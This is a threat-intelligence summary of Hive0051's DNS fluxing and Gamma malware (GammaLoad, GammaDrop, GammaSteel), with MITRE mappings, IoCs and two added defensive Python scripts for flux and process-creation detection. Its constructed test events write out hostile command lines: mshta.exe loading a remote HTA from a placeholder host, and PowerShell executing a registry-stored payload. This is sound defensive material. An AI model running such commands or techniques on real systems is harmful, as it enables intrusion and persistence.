Hive0051’s large scale malicious operations enabled by synchronized multi-channel DNS fluxing

Hive0051 is documented by X-Force as executing large-scale, synchronized multi-channel DNS fluxing to remap its C2 infrastructure across Telegram channels and Telegraph sites, enabling persistent operations and dynamic reallocation of victims across Gamma malware variants. The report details GammaLoad, GammaDrop, and GammaSteel, including fileless and registry-based techniques, USB spreading, and evolving C2 and obfuscation methods that indicate an elevated threat capability, with Ukraine-focused activity and ongoing infrastructure evolution. #Hive0051 #GammaLoad

Keypoints

  • Hive0051 uses a “multi-channel” fluxing approach: the DNS records for its C2 infrastructure are updated in sync across Telegram channels and Telegraph sites, so the infrastructure can be remapped rapidly.
  • X-Force tracks multiple dedicated infrastructure clusters with Telegram channels, DNS apex domains, and Telegraph sites.
  • Hive0051 can graduate victims between C2 clusters by deploying multiple Gamma variant stages.
  • The threat group continually evolves malware with new obfuscation stages, USB-spread capabilities, and victim enumeration scripts.
  • The GammaLoad PowerShell variant has moved to a fileless approach, storing malicious code in the Windows registry, with GammaSteel exfiltration variants also observed.
  • The GammaLoad HTA/VBScript chain uses mshta.exe for remote HTA delivery, with phishing-like lure files and USB propagation.
  • C2 infrastructure uses fast-fluxing and hardcoded apex domains that rotate IPs 1–3 times per day, with the rotations synchronized across the Telegram channels and Telegraph sites that serve as the multi-channel DNS sources.
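The two fluxing signals in the keypoints above (apex domains rotating IPs several times a day, and many actor-controlled names resolving to one active C2 IP) can be checked against passive-DNS data. The script below is an added example written for this summary, not code from the X-Force report: it refangs the two apex domains quoted in the IoC section, counts per-day A-record changes per name, inverts the records to see how many names fan in to each IP, and flags names that show both behaviours. The pDNS observations are constructed, the IPs are RFC 5737 documentation addresses, and the sub-domains and `example.com` entries are made up for contrast.

```python
"""
Passive-DNS triage for synchronized DNS fluxing: apex domains whose A record
changes one to three times per day, and many names fanning in to one C2 IP.
Added example, not code from the report.
"""
from collections import defaultdict
from datetime import datetime


def refang(name: str) -> str:
    """Turn a defanged indicator such as 'antarcticos[.]ru' back into a real name."""
    return name.replace("[.]", ".").lower()


# Constructed passive-DNS observations: (timestamp, queried name, resolved IP).
# Only the two defanged apex domains quoted on the page are real names; the IPs
# are RFC 5737 documentation addresses and every other name is invented.
PDNS_RECORDS = [
    ("2023-11-01T00:10:00", "antarcticos[.]ru", "192.0.2.10"),
    ("2023-11-01T09:30:00", "antarcticos[.]ru", "192.0.2.11"),
    ("2023-11-01T18:05:00", "antarcticos[.]ru", "192.0.2.12"),
    ("2023-11-02T02:00:00", "antarcticos[.]ru", "192.0.2.13"),
    ("2023-11-02T14:00:00", "antarcticos[.]ru", "192.0.2.14"),
    ("2023-11-01T00:12:00", "garibdo[.]ru", "192.0.2.10"),
    ("2023-11-01T09:31:00", "garibdo[.]ru", "192.0.2.11"),
    ("2023-11-01T18:06:00", "garibdo[.]ru", "192.0.2.12"),
    ("2023-11-02T02:01:00", "garibdo[.]ru", "192.0.2.13"),
    ("2023-11-02T14:02:00", "garibdo[.]ru", "192.0.2.14"),
    # constructed sub-domains sharing the currently active IP
    ("2023-11-02T14:05:00", "update.antarcticos[.]ru", "192.0.2.14"),
    ("2023-11-02T14:06:00", "cdn.garibdo[.]ru", "192.0.2.14"),
    # a stable, unrelated record for contrast
    ("2023-11-01T00:00:00", "example.com", "198.51.100.5"),
    ("2023-11-02T00:00:00", "example.com", "198.51.100.5"),
]


def rotations_per_day(records):
    """For each name, count A-record changes per calendar day.

    A change is counted when an observation's IP differs from the previous
    observation for the same name, so a stable record yields no entries.
    """
    observations = defaultdict(list)
    for ts, name, ip in records:
        observations[refang(name)].append((datetime.fromisoformat(ts), ip))

    result = {}
    for name, obs in observations.items():
        changes = defaultdict(int)
        previous_ip = None
        for ts, ip in sorted(obs):
            if previous_ip is not None and ip != previous_ip:
                changes[ts.date().isoformat()] += 1
            previous_ip = ip
        result[name] = dict(changes)
    return result


def names_per_ip(records):
    """Invert the records: which names have resolved to each IP."""
    fan_in = defaultdict(set)
    for _, name, ip in records:
        fan_in[ip].add(refang(name))
    return {ip: sorted(names) for ip, names in fan_in.items()}


def flag_flux_candidates(records, min_rotations=1, min_fan_in=3):
    """Flag names that rotated IPs on some day AND share an IP with several
    other names. Either signal alone is noisy (CDNs and round-robin DNS rotate
    too), which is why both are required here."""
    rotations = rotations_per_day(records)
    shared_names = {
        name
        for names in names_per_ip(records).values()
        if len(names) >= min_fan_in
        for name in names
    }
    flagged = {}
    for name, per_day in rotations.items():
        peak = max(per_day.values(), default=0)
        if peak >= min_rotations and name in shared_names:
            flagged[name] = peak
    return flagged


if __name__ == "__main__":
    for name, peak in flag_flux_candidates(PDNS_RECORDS).items():
        print(f"{name}: up to {peak} IP rotations in one day, shares IPs with other names")
```

On the constructed data both apex domains are flagged with two rotations on each day, while the sub-domains (seen once) and `example.com` (never changes) are not. Real pDNS feeds return far more observations per name, so the thresholds are meant to be tuned against the baseline for the organisation's own resolvers.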

MITRE Techniques

  • [T1071.004] DNS – The operation uses fast-fluxing and multi-channel DNS fluxing with apex domains and Telegram/Telegraph as DNS channels: “the automated synchronized fluxing of dynamic DNS records across Telegram channels and Telegraph sites at scale” and “Telegram channels and Telegraph sites are essentially used as DNS servers”.
  • [T1071.001] Web Protocols – GammaLoad generates multiple HTTP requests with random integers and hardcoded paths, including custom headers; “The target URLs would often contain multiple random integers at specific locations” and “custom HTTP headers added to the requests.”
  • [T1059.005] VBScript – GammaLoad variants rely on VBScript-based execution paths for their dropper and payload delivery: “The downloaded .HTA is the VBScript-based GammaLoad installer.”
  • [T1218.005] Signed Binary Proxy Execution: Mshta – The installer downloads and executes remote HTA via mshta.exe: “downloads and execute another remote .HTA file via the windows binary mshta.exe.”
  • [T1059.001] PowerShell – GammaLoad/Steel variants leverage PowerShell for payloads, with fileless behavior and registry storage: “storing all necessary code in the registry, making it almost completely fileless.”
  • [T1047] Windows Management Instrumentation – GammaLoad uses a WMI query to resolve C2 IPs: “executing a WMI query” and “This runs the ping command against a specific domain.”
  • [T1091] Replication Through Removable Media – USB Spreader capability spreads via USB drives by recursively copying itself into subfolders: “spreads via USB drives… recursively into subfolders of connected USB drives.”
  • [T1112] Modify Registry – Fileless registry persistence observed, with GammaLoad’s code stored in the registry and used to re-inject payloads: “stored all malicious code dispersed in the Windows registry.”
  • [T1562.001] Impair Defenses – The loader checks for a running antivirus process, QHActiveDefense.exe, and the result of that check can change which payload execution path is taken: “the most recent variants also search for a specific process running on the host: QHActiveDefense.exe.”
  • [T1053.005] Scheduled Task – GammaDrop creates a new scheduled task after dropping its payload: “creates a new scheduled task after dropping its payload.”
  • [T1566.001] Phishing – Lure HTA/HTML files are used to trick victims into opening content: “lures designed to trick victims into opening it.”
  • [T1082] System Information Discovery – PowerShell reconnaissance collects system info, screenshots, and AV details: “PowerShell reconnaissance script” collects “System info” and “Anti-virus products.”
  • [T1113] Screen Capture – The reconnaissance script collects a screenshot: “Screenshot”
  • [T1027] Obfuscated/Compressed Files and Information – GammaLoad’s obfuscation stages and encoded payloads indicate obfuscation: “several encoded and hardcoded payloads.”
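Three of the techniques in the list above leave distinctive process-creation telemetry: mshta.exe being handed a URL (T1218.005), a ping spawned through WMI (T1047), and PowerShell reading a registry value and executing it (T1059.001, the fileless registry storage). The rules below are an added example written for this summary, not detection content from the X-Force report. The events are constructed in Sysmon Event ID 1 field naming; the host `example.invalid`, the registry key `HKCU:\Software\PlaceholderKey` and the user paths are placeholders, and the only name taken from the page is the apex domain `antarcticos.ru`.

```python
"""
Process-creation rules for three techniques in the Hive0051 summary:
remote HTA via mshta.exe, WMI-spawned ping, and PowerShell executing a
registry-stored payload. Added example, not the report's code.
"""
import re
from pathlib import PureWindowsPath

# Constructed events. Field names follow Sysmon EID 1; every value is invented
# except the apex domain quoted on the page.
EVENTS = [
    {   # 0: mshta.exe asked to load a remote HTA (the GammaLoad delivery step)
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"mshta.exe https://example.invalid/stage/installer.hta",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # 1: ping launched by the WMI provider host, i.e. the result of a WMI query
        "Image": r"C:\Windows\System32\PING.EXE",
        "CommandLine": "ping -n 1 antarcticos.ru",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
    },
    {   # 2: PowerShell reading a registry value and executing it (fileless stage)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -w hidden -c "IEX (Get-ItemProperty HKCU:\Software\PlaceholderKey).stage"',
        "ParentImage": r"C:\Windows\System32\wscript.exe",
    },
    {   # 3: benign: mshta.exe running a local file; the remote rule must not fire
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"mshta.exe C:\Users\alice\AppData\Local\Temp\local.hta",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # 4: benign: an operator pinging from a shell
        "Image": r"C:\Windows\System32\PING.EXE",
        "CommandLine": "ping -n 1 example.com",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path; PureWindowsPath parses it on any host OS."""
    return PureWindowsPath(path).name.lower()


def rule_mshta_remote_hta(ev) -> bool:
    """mshta.exe with a URL on its command line (remote HTA delivery)."""
    return basename(ev["Image"]) == "mshta.exe" and bool(URL_RE.search(ev["CommandLine"]))


def rule_wmi_spawned_ping(ev) -> bool:
    """ping.exe whose parent is the WMI provider host or wmic.exe."""
    return (basename(ev["Image"]) == "ping.exe"
            and basename(ev["ParentImage"]) in {"wmiprvse.exe", "wmic.exe"})


def rule_powershell_registry_payload(ev) -> bool:
    """PowerShell reading a registry value and passing it to IEX / Invoke-Expression."""
    cl = ev["CommandLine"]
    return (basename(ev["Image"]) in {"powershell.exe", "pwsh.exe"}
            and "get-itemproperty" in cl.lower()
            and EXEC_RE.search(cl) is not None)


RULES = {
    "mshta_remote_hta": rule_mshta_remote_hta,
    "wmi_spawned_ping": rule_wmi_spawned_ping,
    "powershell_registry_payload": rule_powershell_registry_payload,
}


def evaluate(events):
    """Return (event index, rule name) for every rule that fires, in event order."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for idx, rule in evaluate(EVENTS):
        print(f"event {idx}: {rule} -> {EVENTS[idx]['CommandLine']}")
```

The mshta rule deliberately keys on a URL rather than on mshta.exe itself, because local HTA execution is common in legitimate administration; the trade-off is that a first-stage lure run from disk (event 3) is left to other controls. The WMI rule relies on parent-process lineage, so it needs a telemetry source that records ParentImage, such as Sysmon or an EDR.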

Indicators of Compromise

  • [Domain] antarcticos[.]ru, garibdo[.]ru – apex domains used for C2 DNS fluxing and domain history linking to rotated IPs.
  • [Domain] (additional apex domains associated with GammaLoad) – used in passive DNS data; “a large quantity of actor-controlled domain names resolves to one active C2 IP address.”
  • [File] layout.xml – GammaSteel uses a database file named “layout.xml” to store pseudo-hashes of exfiltrated files.
  • [Process] QHActiveDefense.exe – anti-virus process targeted/detected by newer GammaLoad variants.
  • [Process] mshta.exe – used to execute remote HTA payloads as part of the infection chain.
  • [File] .HTA – lure HTA files used in the infection chain to download and execute payloads.
  • [File] GammaLoad dropper/HTA variant – components described as VBScript-based installers and HTA downloaders.

Read more: https://securityintelligence.com/x-force/hive0051-malicious-operations-enabled-dns-fluxing/